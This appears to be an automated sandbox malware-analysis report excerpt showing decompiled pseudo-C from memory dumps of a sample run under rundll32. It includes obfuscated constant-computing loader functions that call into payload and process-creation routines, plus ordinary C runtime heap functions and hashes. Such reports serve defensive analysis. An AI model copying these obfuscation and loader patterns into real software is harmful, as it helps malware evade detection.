                                                                                                                    0x0033fbcf
                                                                                                                    0x0033fbd7
                                                                                                                    0x0033fbdf
                                                                                                                    0x0033fbe7
                                                                                                                    0x0033fbef
                                                                                                                    0x0033fbf7
                                                                                                                    0x0033fbff
                                                                                                                    0x0033fc04
                                                                                                                    0x0033fc0c
                                                                                                                    0x0033fc14
                                                                                                                    0x0033fc24
                                                                                                                    0x0033fc28
                                                                                                                    0x0033fc30
                                                                                                                    0x0033fc43
                                                                                                                    0x0033fc44
                                                                                                                    0x0033fc4b
                                                                                                                    0x0033fc56
                                                                                                                    0x0033fc61
                                                                                                                    0x0033fc6c
                                                                                                                    0x0033fc77
                                                                                                                    0x0033fc87
                                                                                                                    0x0033fc91
                                                                                                                    0x0033fc96
                                                                                                                    0x0033fc9c
                                                                                                                    0x0033fca4
                                                                                                                    0x0033fcac
                                                                                                                    0x0033fcb4
                                                                                                                    0x0033fcb9
                                                                                                                    0x0033fcc1
                                                                                                                    0x0033fccc
                                                                                                                    0x0033fcd7
                                                                                                                    0x0033fce2
                                                                                                                    0x0033fcea
                                                                                                                    0x0033fcf6
                                                                                                                    0x0033fcf9
                                                                                                                    0x0033fcfd
                                                                                                                    0x0033fd05
                                                                                                                    0x0033fd0d
                                                                                                                    0x0033fd1a
                                                                                                                    0x0033fd1e
                                                                                                                    0x0033fd23
                                                                                                                    0x0033fd2b
                                                                                                                    0x0033fd36
                                                                                                                    0x0033fd3e
                                                                                                                    0x0033fd49
                                                                                                                    0x0033fd51
                                                                                                                    0x0033fd59
                                                                                                                    0x0033fd61
                                                                                                                    0x0033fd69
                                                                                                                    0x0033fd6e
                                                                                                                    0x0033fd76
                                                                                                                    0x0033fd7b
                                                                                                                    0x0033fd83
                                                                                                                    0x0033fd8b
                                                                                                                    0x0033fd93
                                                                                                                    0x0033fd9b
                                                                                                                    0x0033fda8
                                                                                                                    0x0033fdac
                                                                                                                    0x0033fdb4
                                                                                                                    0x0033fdbc
                                                                                                                    0x0033fdc4
                                                                                                                    0x0033fdcc
                                                                                                                    0x0033fdd4
                                                                                                                    0x0033fddc
                                                                                                                    0x0033fde0
                                                                                                                    0x0033fdf2
                                                                                                                    0x0033ffd1
                                                                                                                    0x0033ffd5
                                                                                                                    0x0033ffd6
                                                                                                                    0x0033ffd7
                                                                                                                    0x0033ffd8
                                                                                                                    0x0033ffd9
                                                                                                                    0x0033ffe8
                                                                                                                    0x0033ffe9
                                                                                                                    0x0033fff3
                                                                                                                    0x0033fff3
                                                                                                                    0x0033fff7
                                                                                                                    0x00340000
                                                                                                                    0x00340000
                                                                                                                    0x0033fdfe
                                                                                                                    0x0033ff5e
                                                                                                                    0x0033ff60
                                                                                                                    0x0033ff64
                                                                                                                    0x0033ff99
                                                                                                                    0x0033ff99
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033ff66
                                                                                                                    0x0033ff66
                                                                                                                    0x0033ff66
                                                                                                                    0x0033ff6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033ff6c
                                                                                                                    0x0033ff81
                                                                                                                    0x0033ff81
                                                                                                                    0x0033ff84
                                                                                                                    0x0033ff87
                                                                                                                    0x0033ff8a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033ff75
                                                                                                                    0x0033ff79
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033ff7b
                                                                                                                    0x0033ff7e
                                                                                                                    0x0033ff7e
                                                                                                                    0x0033ff7e
                                                                                                                    0x0033ff8c
                                                                                                                    0x0033ff8c
                                                                                                                    0x0033ff8e
                                                                                                                    0x0033ff91
                                                                                                                    0x0033ff91
                                                                                                                    0x0033ff94
                                                                                                                    0x0033ff94
                                                                                                                    0x00000000
                                                                                                                    0x0033ff66
                                                                                                                    0x0033fe0a
                                                                                                                    0x0033ff52
                                                                                                                    0x0033ff54
                                                                                                                    0x00000000
                                                                                                                    0x0033ff54
                                                                                                                    0x0033fe16
                                                                                                                    0x0033fe8f
                                                                                                                    0x0033fe9a
                                                                                                                    0x0033fe9e
                                                                                                                    0x0033fead
                                                                                                                    0x0033feae
                                                                                                                    0x0033fecf
                                                                                                                    0x0033fed4
                                                                                                                    0x0033fee0
                                                                                                                    0x0033ff22
                                                                                                                    0x0033ff2e
                                                                                                                    0x0033ff37
                                                                                                                    0x0033ff3c
                                                                                                                    0x0033ff3f
                                                                                                                    0x00000000
                                                                                                                    0x0033ff3f
                                                                                                                    0x0033fe18
                                                                                                                    0x0033fe1e
                                                                                                                    0x0033fe24
                                                                                                                    0x0033fe2d
                                                                                                                    0x0033fe5e
                                                                                                                    0x0033fe6a
                                                                                                                    0x0033fe74
                                                                                                                    0x0033fe7c
                                                                                                                    0x0033fe82
                                                                                                                    0x0033fe87
                                                                                                                    0x0033fe87
                                                                                                                    0x0033ffc3
                                                                                                                    0x0033ffc9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033ffcf
                                                                                                                    0x0033ffb7
                                                                                                                    0x0033ffbd
                                                                                                                    0x0033ffbe
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                    • API String ID: 1514166925-3316477785
                                                                                                                    • Opcode ID: 683082f08a09aa4e999562d2a4e96d4afbbc58673c1b02cc976c8a3cc7776b97
                                                                                                                    • Instruction ID: bd61ec28c797e6b941a09d81ff7d921c3f1c47bd0afc5ea15c9e80d9dd68c271
                                                                                                                    • Opcode Fuzzy Hash: 683082f08a09aa4e999562d2a4e96d4afbbc58673c1b02cc976c8a3cc7776b97
                                                                                                                    • Instruction Fuzzy Hash: 5A022F725083808FD368CF25C58AA1BFBE2BBC5718F508A1DF5D98A260D7B59949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033E991 Relevance: 2.6, Strings: 2, Instructions: 68COMMONCrypto
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 267 33e991-33ea60 268 33ea62-33ea77 call 33f8fd 267->268 269 33ea90-33ea96 267->269 268->269 272 33ea79-33ea88 call 3393ed 268->272 274 33ea8d 272->274 274->269
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			_entry_(intOrPtr _a4, char _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_v32 = _v32 & 0x00000000;
				_v44 = 0xa88528;
				_v40 = 0x811176;
				_v36 = 0xed2c64;
				_v20 = 0x893932;
				_v20 = _v20 ^ 0x2faf083b;
				_v20 = _v20 ^ 0x2f2d1c53;
				_v8 = 0xbe2d1;
				_t85 = 0x2e;
				_v8 = _v8 / _t85;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0xffff961f;
				_v8 = _v8 ^ 0xfff451d0;
				_v16 = 0x50855f;
				_v16 = _v16 >> 8;
				_t86 = 0x5e;
				_v16 = _v16 / _t86;
				_v16 = _v16 ^ 0x0002614f;
				_v28 = 0x752e5d;
				_t36 =  &_v28; // 0x752e5d
				_t87 = 0x4e;
				_v28 =  *_t36 * 0x6f;
				_v28 = _v28 ^ 0x32c1ec83;
				_v12 = 0xba9db2;
				_v12 = _v12 * 0x41;
				_v12 = _v12 + 0xfc46;
				_v12 = _v12 | 0x4911db39;
				_v12 = _v12 ^ 0x6f7f0271;
				_v24 = 0x2e0372;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000c7ca5;
				_t58 =  &_a8;
				 *_t58 = _a8 - 1;
				if( *_t58 == 0) {
					 *0x35320c = _a4;
					if(E0033F8FD() != 0) {
						E003393ED(); // executed
					}
				}
				return 1;
			}
















                                                                                                                    0x0033e997
                                                                                                                    0x0033e99d
                                                                                                                    0x0033e9a4
                                                                                                                    0x0033e9ab
                                                                                                                    0x0033e9b2
                                                                                                                    0x0033e9b9
                                                                                                                    0x0033e9c0
                                                                                                                    0x0033e9c7
                                                                                                                    0x0033e9d3
                                                                                                                    0x0033e9d8
                                                                                                                    0x0033e9dd
                                                                                                                    0x0033e9e1
                                                                                                                    0x0033e9e8
                                                                                                                    0x0033e9ef
                                                                                                                    0x0033e9f6
                                                                                                                    0x0033e9fd
                                                                                                                    0x0033ea02
                                                                                                                    0x0033ea07
                                                                                                                    0x0033ea0e
                                                                                                                    0x0033ea15
                                                                                                                    0x0033ea19
                                                                                                                    0x0033ea1a
                                                                                                                    0x0033ea1d
                                                                                                                    0x0033ea24
                                                                                                                    0x0033ea2f
                                                                                                                    0x0033ea32
                                                                                                                    0x0033ea39
                                                                                                                    0x0033ea40
                                                                                                                    0x0033ea47
                                                                                                                    0x0033ea53
                                                                                                                    0x0033ea56
                                                                                                                    0x0033ea5d
                                                                                                                    0x0033ea5d
                                                                                                                    0x0033ea60
                                                                                                                    0x0033ea65
                                                                                                                    0x0033ea77
                                                                                                                    0x0033ea88
                                                                                                                    0x0033ea8d
                                                                                                                    0x0033ea77
                                                                                                                    0x0033ea96

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID: ].u$d,
                                                                                                                    • API String ID: 621844428-1507873175
                                                                                                                    • Opcode ID: dd36eb932c41a05549509f7d942c7d93772477c841827cc0125d1f17d535e010
                                                                                                                    • Instruction ID: 17965df0b54315f671cfe4a78a591490a609b15c1b8f52000e1001b5f914c3ec
                                                                                                                    • Opcode Fuzzy Hash: dd36eb932c41a05549509f7d942c7d93772477c841827cc0125d1f17d535e010
                                                                                                                    • Instruction Fuzzy Hash: BF31F4B1D0020DEBDB08DFA4D98A6DEBBF0FB54314F208199D510BB250D7B45B859F80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033AB87 Relevance: 1.4, Strings: 1, Instructions: 154COMMONCrypto
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 288 33ab87-33ad94 call 3420b9 call 334b61 call 337f5d 294 33ad99-33ad9e 288->294 295 33ada0-33ada2 294->295 296 33addd 294->296 297 33adb0-33addb call 341e67 * 2 295->297 298 33ada4-33adaa 295->298 299 33addf-33ade5 296->299 300 33adab-33adae 297->300 298->300 300->299
                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E0033AB87(void* __ecx, void* __edx, void* __eflags) {
				void* _t151;
				void* _t163;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr* _t193;
				void* _t194;

				_t193 = _t194 - 0x5c;
				_push( *((intOrPtr*)(_t193 + 0x7c)));
				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
				_push( *((intOrPtr*)(_t193 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t193 + 0x70)));
				_push(_t187);
				_push( *((intOrPtr*)(_t193 + 0x68)));
				_push( *((intOrPtr*)(_t193 + 0x64)));
				_push(__ecx);
				E003420B9(_t151);
				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
				 *(_t193 + 0x34) = 0xb35e3d;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
				 *(_t193 + 0x1c) = 0xb39a57;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
				 *(_t193 + 0x54) = 0x8cfebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
				_t169 = 0x1d;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
				 *(_t193 + 0x24) = 0xadd23a;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
				 *(_t193 + 0x20) = 0x1d5481;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
				 *(_t193 + 0x2c) = 0x3c40b3;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
				 *(_t193 + 0x3c) = 0x52e0cb;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
				 *(_t193 + 0x4c) = 0x46a878;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
				 *(_t193 + 0x30) = 0x13da24;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
				 *(_t193 + 0x44) = 0xdb90c5;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
				 *(_t193 + 0x38) = 0xc3d0db;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
				 *(_t193 + 0x58) = 0x1a470a;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
				 *(_t193 + 0x40) = 0xc6f633;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
				 *(_t193 + 0x50) = 0xa2e0bb;
				_t170 = 0x56;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
				 *(_t193 + 0x28) = 0x4b9267;
				_t171 = 0x28;
				_t115 = _t193 - 0x48; // 0x181c8bbc
				_t172 = _t115;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
				 *(_t193 + 0x48) = 0xd50758;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
				_push( *(_t193 + 0x1c));
				_push( *(_t193 + 0x34));
				_t190 = 0x44;
				E00334B61(_t115, _t190);
				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
				_t129 = _t193 - 4; // 0x181c8c00
				_t131 = _t193 - 0x48; // 0x181c8bbc
				_t163 = E00337F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
				if(_t163 == 0) {
					_t164 = 0;
				} else {
					if(_t187 == 0) {
						E00341E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
						E00341E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t164 = 1;
				}
				return _t164;
			}













                                                                                                                    0x0033ab88
                                                                                                                    0x0033ab94
                                                                                                                    0x0033ab97
                                                                                                                    0x0033ab9a
                                                                                                                    0x0033ab9d
                                                                                                                    0x0033ab9f
                                                                                                                    0x0033aba2
                                                                                                                    0x0033aba3
                                                                                                                    0x0033aba6
                                                                                                                    0x0033abaa
                                                                                                                    0x0033abab
                                                                                                                    0x0033abb0
                                                                                                                    0x0033abb6
                                                                                                                    0x0033abbd
                                                                                                                    0x0033abc4
                                                                                                                    0x0033abcb
                                                                                                                    0x0033abd2
                                                                                                                    0x0033abd6
                                                                                                                    0x0033abdd
                                                                                                                    0x0033abe4
                                                                                                                    0x0033abeb
                                                                                                                    0x0033abf2
                                                                                                                    0x0033abf9
                                                                                                                    0x0033ac00
                                                                                                                    0x0033ac09
                                                                                                                    0x0033ac0e
                                                                                                                    0x0033ac13
                                                                                                                    0x0033ac1a
                                                                                                                    0x0033ac21
                                                                                                                    0x0033ac28
                                                                                                                    0x0033ac2f
                                                                                                                    0x0033ac36
                                                                                                                    0x0033ac3d
                                                                                                                    0x0033ac44
                                                                                                                    0x0033ac4b
                                                                                                                    0x0033ac52
                                                                                                                    0x0033ac59
                                                                                                                    0x0033ac60
                                                                                                                    0x0033ac67
                                                                                                                    0x0033ac6e
                                                                                                                    0x0033ac75
                                                                                                                    0x0033ac79
                                                                                                                    0x0033ac80
                                                                                                                    0x0033ac87
                                                                                                                    0x0033ac8e
                                                                                                                    0x0033ac91
                                                                                                                    0x0033ac98
                                                                                                                    0x0033ac9f
                                                                                                                    0x0033aca3
                                                                                                                    0x0033acaa
                                                                                                                    0x0033acb1
                                                                                                                    0x0033acb8
                                                                                                                    0x0033acbc
                                                                                                                    0x0033acc3
                                                                                                                    0x0033acca
                                                                                                                    0x0033accd
                                                                                                                    0x0033acd4
                                                                                                                    0x0033acdb
                                                                                                                    0x0033ace2
                                                                                                                    0x0033ace9
                                                                                                                    0x0033aced
                                                                                                                    0x0033acf4
                                                                                                                    0x0033acfb
                                                                                                                    0x0033ad05
                                                                                                                    0x0033ad08
                                                                                                                    0x0033ad0b
                                                                                                                    0x0033ad16
                                                                                                                    0x0033ad19
                                                                                                                    0x0033ad20
                                                                                                                    0x0033ad2c
                                                                                                                    0x0033ad31
                                                                                                                    0x0033ad31
                                                                                                                    0x0033ad34
                                                                                                                    0x0033ad37
                                                                                                                    0x0033ad3e
                                                                                                                    0x0033ad45
                                                                                                                    0x0033ad4c
                                                                                                                    0x0033ad50
                                                                                                                    0x0033ad57
                                                                                                                    0x0033ad5a
                                                                                                                    0x0033ad5f
                                                                                                                    0x0033ad62
                                                                                                                    0x0033ad6a
                                                                                                                    0x0033ad6d
                                                                                                                    0x0033ad74
                                                                                                                    0x0033ad94
                                                                                                                    0x0033ad9e
                                                                                                                    0x0033addd
                                                                                                                    0x0033ada0
                                                                                                                    0x0033ada2
                                                                                                                    0x0033adbf
                                                                                                                    0x0033add3
                                                                                                                    0x0033ada4
                                                                                                                    0x0033ada7
                                                                                                                    0x0033ada8
                                                                                                                    0x0033ada9
                                                                                                                    0x0033adaa
                                                                                                                    0x0033adaa
                                                                                                                    0x0033adad
                                                                                                                    0x0033adad
                                                                                                                    0x0033ade5

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID: nJQ
                                                                                                                    • API String ID: 963392458-2884827605
                                                                                                                    • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                    • Instruction ID: 3302123e8a898e84e64c52afc57ff1b50967fa8935125ce120797f02e77ff038
                                                                                                                    • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                    • Instruction Fuzzy Hash: B471F272400288EBCF59CFA4C9898CE3BA5FF48358F118119FE1696224D3B6D9A9DF45
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                      • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                      • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 501242067-0
                                                                                                                    • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                    • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                    • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                    • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                    • GlobalHandle.KERNEL32(003C89A8), ref: 100208A9
                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                    • GlobalHandle.KERNEL32(003C89A8), ref: 100208DB
                                                                                                                    • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                    • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                    • _memset.LIBCMT ref: 10020911
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 496899490-0
                                                                                                                    • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                    • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                    • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                    • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 1002FA87
                                                                                                                      • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                      • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                      • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                    • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
